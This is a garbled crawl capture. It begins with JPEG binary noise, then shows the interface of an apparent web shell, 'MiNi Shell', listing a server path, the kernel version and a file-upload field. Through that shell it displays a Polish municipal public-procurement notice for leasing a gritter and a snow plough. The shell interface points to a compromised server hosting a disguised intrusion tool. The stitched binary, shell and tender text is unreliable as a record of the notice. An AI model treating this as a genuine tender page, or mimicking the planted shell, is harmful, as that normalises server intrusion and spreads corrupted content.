JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20241010/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20241010/0054006601-N-2024.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Dostawy<br/> Dostawa w formie leasingu operacyjnego z opcją wykupu nowej piaskarki oraz pługa odśnieżnego do zimowego utrzymania dróg pod urządzenie hakowe na samochodzie ciężarowym do 12 ton </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Zakład Gospodarki Komunalnej i Mieszkanowej Gminy Mszczonów</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 750148609</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Spółdzielcza 105</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Mszczonów</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">96-320</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">mazowieckie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL926 - Żyrardowski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">+48 46 858 00 88</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zamowieniapubliczne@zgkim.samorzad.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.bip.zgkim.mszczonow.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - samorządowy zakład budżetowy</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Dostawa w formie leasingu operacyjnego z opcją wykupu nowej piaskarki oraz pługa odśnieżnego do zimowego utrzymania dróg pod urządzenie hakowe na samochodzie ciężarowym do 12 ton </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-f6b2279d-e70f-4ac0-9e60-13823ffc78ca</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2024/BZP 00540066</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2024-10-10</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2024/BZP 00045400/05/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.2.4 Dostawa w formie leasingu operacyjnego z opcją wykupu nowej piaskarki oraz pługa odśnieżnego do zimowego utrzymania dróg pod urządzenie hakowe na samochodzie ciężarowym do 12 ton</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://platformazakupowa.pl/pn/zgkim_mszczonow <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">1.	Komunikacja w postępowaniu o udzielenie zamówienia i w konkursie, w tym składanie ofert, wniosków o dopuszczenie do udziału w postępowaniu lub konkursie, wymiana informacji oraz przekazywanie dokumentów lub oświadczeń między zamawiającym a wykonawcą, z uwzględnieniem wyjątków określonych w ustawie Pzp odbywa się przy użyciu środków komunikacji elektronicznej. Przez środki komunikacji elektronicznej rozumie się środki komunikacji elektronicznej zdefiniowane w ustawie z dnia 18 lipca 2002 r. o świadczeniu usług drogą elektroniczną (Dz. U. z 2020 r. poz. 344 ze zm.). <br/>2.	Postępowanie prowadzone jest w języku polskim w formie elektronicznej za pośrednictwem platformazakupowa.pl pod adresem: https://platformazakupowa.pl/pn/zgkim_mszczonow.</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1.	Zamawiający, zgodnie z Rozporządzeniem Prezesa Rady Ministrów z dnia 31 grudnia 2020r. w sprawie sposobu sporządzania i przekazywania informacji oraz wymagań technicznych dla dokumentów elektronicznych oraz środków komunikacji elektronicznej w postępowaniu o udzielenie zamówienia publicznego lub konkursie (Dz. U. z 2020r. poz. 2452), określa niezbędne wymagania sprzętowo - aplikacyjne umożliwiające pracę na platformazakupowa.pl, tj.:<br/>1)	stały dostęp do sieci Internet o gwarantowanej przepustowości nie mniejszej niż 512 kb/s,<br/>2)	komputer klasy PC lub MAC o następującej konfiguracji: pamięć min. 2 GB Ram, procesor Intel IV 2 GHZ lub jego nowsza wersja, jeden z systemów operacyjnych - MS Windows 7, Mac Os x 10 4, Linux, lub ich nowsze wersje,<br/>3)	zainstalowana dowolna, inna przeglądarka internetowa niż Internet Explorer,<br/>4)	włączona obsługa JavaScript,<br/>5)	zainstalowany program Adobe Acrobat Reader lub inny obsługujący format plików .pdf,<br/>6)	Szyfrowanie na platformazakupowa.pl odbywa się za pomocą protokołu TLS 1.3.<br/>7)	Oznaczenie czasu odbioru danych przez platformę zakupową stanowi datę oraz dokładny czas (hh:mm:ss) generowany wg. czasu lokalnego serwera synchronizowanego z zegarem Głównego Urzędu Miar.<br/>2.	Wykonawca, przystępując do niniejszego postępowania o udzielenie zamówienia publicznego:<br/>1)	akceptuje warunki korzystania z platformazakupowa.pl określone w Regulaminie zamieszczonym na stronie internetowej platformazakupowa.pl w zakładce „Regulamin&#34; oraz uznaje go za wiążący,<br/>2)	zapoznał i stosuje się do Instrukcji składania ofert/wniosków dostępnej pod adresem https://platformazakupowa.pl<br/>3.	Zamawiający nie ponosi odpowiedzialności za złożenie oferty w sposób niezgodny z Instrukcją korzystania z platformazakupowa.pl, w szczególności za sytuację, gdy zamawiający zapozna się z treścią oferty przed upływem terminu składania ofert (np. złożenie oferty w zakładce „Wyślij wiadomość do zamawiającego”). Taka oferta zostanie uznana przez Zamawiającego za ofertę handlową i nie będzie brana pod uwagę w przedmiotowym postępowaniu ponieważ nie został spełniony obowiązek narzucony w art. 221 Ustawy Prawo Zamówień Publicznych.<br/>4.	Zamawiający informuje, że instrukcje korzystania z platformazakupowa.pl dotyczące w szczególności logowania, składania wniosków o wyjaśnienie treści SWZ, składania ofert oraz innych czynności podejmowanych w niniejszym postępowaniu przy użyciu platformazakupowa.pl znajdują się w zakładce „Instrukcje dla Wykonawców&#34; na stronie internetowej pod adresem: platformazakupowa.pl <br/>5. Szczegółowe informacje dotyczące korespondencji zostały wskazane w SWZ.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE)<br/>2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie<br/>swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE<br/>L 119 z 04.05.2016, str. 1), dalej „Rozporządzenie”, informuję, że:<br/>1. Administratorem Pani/Pana danych osobowych jest Zakład Gospodarki Komunalnej i Mieszkaniowej Gminy Mszczonów 96 – 320<br/>Mszczonów, ul. Spółdzielcza 105, e-mail: sekretariat@zgkim.samorzad.pl, nr tel. (46) 858 00 81”.<br/>2. Administrator wyznaczył Inspektora Ochrony Danych, z którym może Pani/Pan skontaktować się pod adresem e-mali:<br/>inspektor@cbi24.pl lub pisemnie, kierując korespondencję pod adres siedziby Administratora.<br/>3. Dane osobowe będą przetwarzane w celu związanym z postępowaniem o udzielenie zamówienia publicznego.<br/>4. Dane osobowe będą przetwarzane przez okres zgodnie z art. 78 ust. 1 i 4 ustawy z dnia z dnia 11 września 2019 r.– Prawo<br/>zamówień publicznych, zwanej dalej PZP, przez okres 4 lat od dnia zakończenia postępowania o udzielenie zamówienia, a jeżeli<br/>czas trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały czas obowiązywania umowy.<br/>5. Podstawą prawną przetwarzania danych jest art. 6 ust. 1 lit. c) ww. Rozporządzenia w związku z przepisami PZP.6. Odbiorcami Pani/Pana danych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w oparciu o<br/>art. 18 oraz art. 74 ust. 4 PZP.<br/>7. Obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest wymogiem ustawowym<br/>określonym w przepisach PZP, związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego; konsekwencje<br/>niepodania określonych danych wynikają z PZP.<br/>8. Osoba, której dane dotyczą ma prawo do:<br/>- dostępu do treści swoich danych oraz możliwości ich poprawiania, sprostowania, ograniczenia przetwarzania,<br/>- w przypadku gdy przetwarzanie danych odbywa się z naruszeniem przepisów Rozporządzenia służy prawo wniesienia skargi do<br/>organu nadzorczego tj. Prezesa Urzędu Ochrony Danych Osobowych, ul. Stawki 2, 00-193 Warszawa,<br/>9. Osobie, której dane dotyczą nie przysługuje:<br/>- w związku z art. 17 ust. 3 lit. b, d lub e Rozporządzenia prawo do usunięcia danych osobowych;<br/>- prawo do przenoszenia danych osobowych, o którym mowa w art. 20 Rozporządzenia;<br/>- na podstawie art. 21 Rozporządzenia prawo sprzeciwu, wobec przetwarzania danych osobowych.<br/>10. W przypadku gdy wykonanie obowiązków, o których mowa w art. 15 ust. 1-3 Rozporządzenia, wymagałoby niewspółmiernie<br/>dużego wysiłku, Administrator może żądać od osoby, której dane dotyczą, wskazania dodatkowych informacji mających na celu<br/>sprecyzowanie żądania, w szczególności podania nazwy lub daty postępowania o udzielenie zamówienia publicznego.<br/>11. Skorzystanie przez osobę, której dane dotyczą, z uprawnienia do sprostowania lub uzupełnienia danych osobowych, o którym<br/>mowa w art. 16 Rozporządzenia, nie może skutkować zmianą wyniku postępowania o udzielenie zamówienia publicznego lub<br/>konkursu ani zmianą postanowień umowy w zakresie niezgodnym z PZP.</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">12. Wystąpienie z żądaniem, o którym mowa w art. 18 ust. 1 Rozporządzenia, nie<br/>ogranicza przetwarzania danych osobowych do czasu zakończenia postępowania o udzielenie zamówienia publicznego.<br/>13. W przypadku danych osobowych zamieszczonych przez Administratora w Biuletynie Zamówień Publicznych, prawa, o których<br/>mowa w art. 15 i art. 16 Rozporządzenia, są wykonywane w drodze żądania skierowanego do Administratora.<br/>14. Od dnia zakończenia postępowania o udzielenie zamówienia, w przypadku gdy wniesienie żądania, o którym mowa w art. 18 ust.<br/>1 Rozporządzenia, spowoduje ograniczenie przetwarzania danych osobowych zawartych w protokole i załącznikach do protokołu,<br/>Administrator nie udostępnia tych danych zawartych w protokole i w załącznikach do protokołu, chyba że zachodzą przesłanki, o<br/>których mowa w art. 18 ust. 2 Rozporządzenia.<br/>15. Skorzystanie przez osobę, której dane dotyczą, z uprawnienia do sprostowania lub uzupełnienia, o którym mowa w art. 16<br/>Rozporządzenia, nie może naruszać integralności protokołu oraz jego załączników.<br/>16. Ponadto informujemy, iż w związku z przetwarzaniem Pani/Pana danych osobowych nie podlega Pan/Pani decyzjom, które się<br/>opierają wyłącznie na zautomatyzowanym przetwarzaniu, w tym profilowaniu, o czym stanowi art. 22 Rozporządzenia.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">6/OOM/2024</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Dostawy</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest dostawa w formie leasingu operacyjnego z opcją wykupu nowej piaskarki oraz pługa odśnieżnego do zimowego utrzymania dróg pod urządzenie hakowe na samochodzie ciężarowym do 12 ton.<br/>Określenie przedmiotu zamówienia : <br/>1)	Wymagania dotyczące leasingu.<br/>1.1	Wpłata początkowa - 10 % netto wartości przedmiotu leasingu zawierająca czynsz inicjalny, opłatę manipulacyjną oraz czynsz „0”.Wpłata początkowa zostanie wpłacona w terminie do 7 dni po podpisaniu umowy pod warunkiem dostarczenia faktury VAT Zamawiającemu. <br/>1.2 Umowa leasingu operacyjnego zostanie zawarta na okres 36 miesięcy od dnia dostarczenia sprzętu<br/>1.3	Opłata końcowa ( wykup ) 1 %. netto wartości przedmiotu leasingu<br/>1.4 Raty leasingowe płatne będą zgodnie z harmonogramem płatności. Na tę okoliczność Wykonawca będzie wystawiał comiesięczne faktury VAT z terminem płatności 14 dni od daty jej wystawienia. <br/>1.5	Koszt określenia wartości sprzętu leży po stronie wykonawcy.<br/>1.6	Po upływie okresu leasingu Zamawiający zastrzega sobie prawo wykupu przedmiotu leasingu, po spłaceniu przez Zamawiającego wszelkich należności wynikających z umowy leasingu.<br/>1.7	Waluta leasingu – polski złoty, raty leasingowe w oparciu o zmienną stopę procentową WIBOR 1M.<br/>2)	Warunki ubezpieczenia<br/>2.1	Zamawiający we własnym zakresie dokona ubezpieczenia sprzętu w zakresie wskazanym przez Wykonawcę, na co Wykonawca wyraża zgodę<br/>3)	Wymagania dotyczące nowej piaskarki do zimowego utrzymania dróg<br/>3.1	Piaskarka fabryczne nowa nie używana, rok produkcji 2023 lub 2024.<br/>3.2	Pojemność skrzyni materiałów sypkich (typu sól, piasek, mieszanka piaskowo-solna lub inny materiał uszorstniający): min 4m3, max 5m3 <br/>3.3	Ładowność piaskarki dla mieszanki piaskowo-solnej lub innego materiału uszorstniającego: min 5 ton, max 7 ton.<br/>3.4	Wyposażona co najmniej w podpory demontażowe, ostrzegawcze lampy błyskowe co najmniej 2 szt., tylny reflektor roboczy umożliwiający pracę w nocy<br/>3.5	Piaskarka przystosowana do zamontowania pod urządzenie hakowe<br/>3.6	Wszystkie elementy i złącza śrubowe wykonane z materiałów odpornych na korozję i odpowiednio zabezpieczonych przed chemicznym działaniem soli (dopuszcza się lakierowanie proszkowe elementów stalowych), kraty na zasobniku ocynkowane, tylny lej oraz talerz rozrzucający ze stali nierdzewnej, <br/>3.7	Napęd - silnik wysokoprężny chłodzony cieczą umieszczony w komorze z tyłu lub boku posypywarki.<br/>3.8	Przeniesienie napędu - hydrauliczno – mechaniczne. Zbiornik paliwa - z wziernikowym wskaźnikiem poziomu paliwa, <br/>3.9	Zbiornik oleju - z wziernikowym wskaźnikiem poziomu.<br/>3.10	Przystosowana pod napięcie instalacji elektrycznej pojazdu - 24 V <br/>3.11	Wymiary:<br/>a)	Szerokość sypania - 2 do 10 [m], stopniowo co 1 [m]<br/>3.12	Przystosowana do prędkość jazdy podczas sypania - do 50 km/h<br/>3.13	Sterowanie - elektroniczno hydrauliczny system obsługiwany z pulpitu umieszczonego w kabinie kierowcy; awaryjny system uruchamiania silnika i sterowania ręcznego podstawowymi funkcjami posypywarki.<br/>3.14	Wyposażona w drabinkę i inne elementy zapewniające bezpieczne użytkowanie w szczególności poręcze ochronne/balustrada, podnóża magazynowe. <br/>3.15	Pulpit operatorskiego wyposażonego w <br/>a)	Przycisk uruchamiania silnika spalinowego.<br/>b)	Włącznik sypania (włącza podajnik mat. i talerz rozsypujący).<br/>c)	Pokrętło regulacji prędkości biegu taśmy (gęstość posypywania).<br/>d)	Kontrolka ładowania akumulatora.<br/>e)	Przycisk załączania świec żarowych silnika spalinowego.<br/>f)	Włącznik oświetlenia (lampa robocza).<br/>g)	Główny wyłącznik zasilania z kontrolką (świeci gdy włączone jest zasilanie).<br/>h)	Pokrętło regulacji prędkości obrotów talerza rozsypującego (szerokość sypania).<br/>i)	Kontrolka załączenia oświetlenia.<br/>j)	Przycisk sterowania asymetrią posypu lewo/prawo<br/>k)	Wyświetlacz położenia rynny asymetrii.<br/>3.16	Piaskarka nie wymaga żadnych dodatkowych dopłat i jest gotowy do eksploatacji. Sprzęt posiada kompletną dokumentację, w tym książkę gwarancyjną, instrukcję obsługi w języku polskim.<br/><br/>4)	Wymagania dotyczące nowego pługa odśnieżnego do zimowego utrzymania dróg<br/><br/>4.1	Pług fabryczne nowy nie używany, rok produkcji 2023 lub 2024<br/>4.2	Konstrukcja pługa – stalowa, dopuszcza się odkładnice z tworzywa sztucznego, lemiesz gumowy. <br/>4.3	Wszystkie elementy i złącza śrubowe wykonane z materiałów odpornych na korozję i odpowiednio zabezpieczonych przed chemicznym działaniem soli (dopuszcza się lakierowanie proszkowe elementów stalowych)<br/>4.4	Wyposażony co najmniej w światła drogowe, światła obrysowe, folię odblaskową, chorągiewki ostrzegawcze, podpory, kółka podporowe, odbojniki przykrawężnikowe po prawej i lewej stronie <br/>4.5	Szerokość odśnieżania: 2700 -3200 mm<br/>4.6	Szerokość odkładnicy: max. 3200 mm<br/>4.7	Wysokość odkładnicy: max.1100 mm<br/>4.8	Kąt skrętu: ± 30 º<br/>4.9	Kąt oscylacji poprzecznej: ± 6,5 º<br/>4.10	Prześwit odkładnicy w pozycji transport: 300 – 400 mm<br/>4.11	Zwis odkładnicy poniżej poziomu jezdni : 200 – 300 mm<br/>4.12	Czas podnoszenia odkładnicy: max. 6 s<br/>4.13	Ciśnienie robocze w układzie: 15-20 Mpa<br/>4.14	Przystosowany do prędkości jazdy podczas odśnieżania - do 50 km/h<br/>4.15	Masa pługa: min 580 kg, max. 650 kg<br/>4.16	Pług przystosowany do zamontowania na nośniku Zamawiającego.<br/>4.17	Nie wymaga żadnych dodatkowych dopłat i jest gotowy do eksploatacji. Sprzęt posiada kompletną dokumentację, w tym książkę gwarancyjną, instrukcję obsługi w języku polskim.<br/><br/>5)	Dane samochodu- nośnika piaskarki oraz pługa:<br/>5.1 Mercedes Atego z urządzeniem hakowym do kontenerów KP7 i KP10<br/>- wysokość haka 1200 mm.<br/>- długość urządzenie 3800 mm.<br/>- nominalna moc załadunkowa 7000 kg.<br/><br/>6) Dodatkowe wymagania dotyczące przedmiotu zamówienia:<br/>6.1	Termin dostawy przedmiotu zamówienia maksimum 60 dni od podpisania Umowy(termin dostawy stanowi kryterium oceny ofert).<br/>6.2 Miejsce dostawy przedmiotu zamówienia – do siedziby Zamawiającego, tj. Mszczonów, ul. Spółdzielcza 105 na koszt dostawcy. <br/>6.3	Wykonawca przeszkoli w cenie dostawy dwóch pracowników Zamawiającego w dniu dostarczenia Przedmiotu umowy wydając stosowne zaświadczenie.<br/>6.4 Przedmiot zamówienia dostarczony zamawiającemu będzie nowy nie używany. Stan sprzętu powinien być przygotowany do pracy i nie wymagać wkładu finansowego przez Zamawiającego.<br/>6.5	W dniu dostawy przedmiot zamówienia powinien zostać uruchomiony oraz sprawdzony względem działania każdych z funkcji. <br/>6.6 Sprzęt wolny od wad fizycznych i prawnych.<br/>6.7	Sprzęt musi spełniać funkcje do jakich jest przeznaczona oraz musi być zgodna z obowiązującym prawem oraz normami WE ( CE). <br/>6.8 Do sprzętu być dołączone następujące dokumenty w języku polskim:<br/>−	instrukcję obsługi w języku polskim,<br/>−	pisemne zapewnienie gwarancji<br/>−	wymagane świadectwo zgodności na znak WE(CE) lub dokument równoważny potwierdzający dopuszczenie do obrotu i używania na terenie Polski;<br/>−	katalog części zamiennych.<br/>−	zakres podstawowych prac, które Zamawiający może Wykonać we własnym zakresie bez utraty gwarancji<br/>oraz wszelkie dokumenty niezbędne do korzystania z sprzętu;<br/>7)	Gwarancja, serwis <br/>7.1	Gwarancja jakości, liczona od dnia protokolarnego odbioru sprzętu min 24- miesięcy ( termin gwarancji i rękojmi stanowi kryterium oceny ofert),<br/>7.2	Usługi gwarancyjne realizowane będą w miejscu użytkowania przedmiotu zamówienia lub w serwisie w zależności od rodzaju usterki, koszt transportu do serwisu pokrywa Wykonawca.<br/>7.3	Wykonawca zapewnia, że reakcja na zgłoszone wady, usterki nastąpi w ciągu 48 godzin, a naprawa zostanie wykonana w ciągu 5 dni roboczych od daty zgłoszenia wady, usterki a jeżeli wystąpi konieczność importu części zamiennych naprawa zostanie wykonana w ciągu 10 dni roboczych od daty zgłoszenia wady, usterki. Awarie będą zgłaszane na adres email wskazany przez Wykonawcę.<br/>7.4	Uprawnienia z tytułu gwarancji nie przysługują w przypadku użytkowania zamówienia niezgodnie z dostarczoną instrukcją obsługi lub po dokonaniu samodzielnych napraw przez Zamawiającego bez pisemnej zgody Wykonawcy.<br/>7.5	Wszelkie wymagane lub zalecane przez producenta sprzętu przeglądy techniczne w okresie gwarancyjnym Wykonawca wykona w ramach wynagrodzenia. Koszty materiałów zużytych części oraz innych elementów podlegających okresowej wymianie, akcesoriów i płynów eksploatacyjnych będzie pokrywał Zamawiający, koszt robocizny będzie po stronie Wykonawcy.<br/>7.6	Wykonawca wyraża zgodę na wykonanie samodzielnie przez Zamawiającego podstawowych prac, takich jak wymiana zużytych części oraz innych elementów podlegających okresowej wymianie, akcesoriów i płynów eksploatacyjnych, bez utraty gwarancji przez Zamawiającego. 